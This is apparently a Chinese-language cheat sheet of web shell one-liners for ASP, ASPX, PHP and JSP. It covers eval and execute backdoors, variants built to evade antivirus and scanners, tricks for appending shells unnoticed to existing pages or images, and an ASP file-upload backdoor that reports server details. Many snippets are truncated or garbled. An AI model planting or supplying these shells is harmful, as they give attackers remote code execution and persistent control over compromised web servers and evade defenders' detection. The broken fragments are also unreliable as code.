%>
""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
'备份专用
'无防下载表,有防下载表突破专用一句话
'防杀防扫专用
"" ThenExecuteGlobal(Request("c"))%>
'不用""
名字)+'') %>
'不用双引号
'可以躲过雷客图
"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>
'容错代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
PHP一句话
<?php @eval_r($_POST1)?>//容错代码
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句
$_POST['c']($_POST['cc']);?>
$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:h=@eval_r($_POST1);
//绕过<?限制的一句话
JSP一句话
提交客户端
ASPX一句话
再补充几个:
推荐还是把一句话加进图片里面去。
普通的php一句话:<?php @eval($_POST['r00ts']);?>
普通的asp一句话:
aspx突破一流的:
[code]
dim da
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
Response.Write "yes"
else
Response.Write "no"
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write "<form action=" method=post>"
Response.Write "<input type=text name=path>"
Response.Write "<br>"
Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))
Response.Write "<br>"
Response.Write "操作系统为:"&Request.ServerVariables("OS")
Response.Write "<br>"
Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")
Response.Write "<br>"
Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"
Response.Write "<br>"
Response.Write "<input type=submit value=save>"
Response.Write "</form>"
</Script>
ASP一句话:”"ThenExecuteGlobal(Request(“1″))%>
PHP防杀放扫 一句话:<?php (])?>
上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如
index.asp里面也是可以的!
因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件
的最底部不会出错!<?if (isset($_POST['1'])){eval($_POST['1']);}?><?php system
($_REQUEST[1]);?>
无防下载表,有防下载表可尝试插入以下语句突破的一句话
(“class”)%>
备份专用
asp一句话
aspx一句话:WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y
(“add6bb58e139be10″);
可以躲过雷客图的一句话。
ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,
requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>
不用'‘的asp一句话execute request(“1″)
不用双引号的一句话。
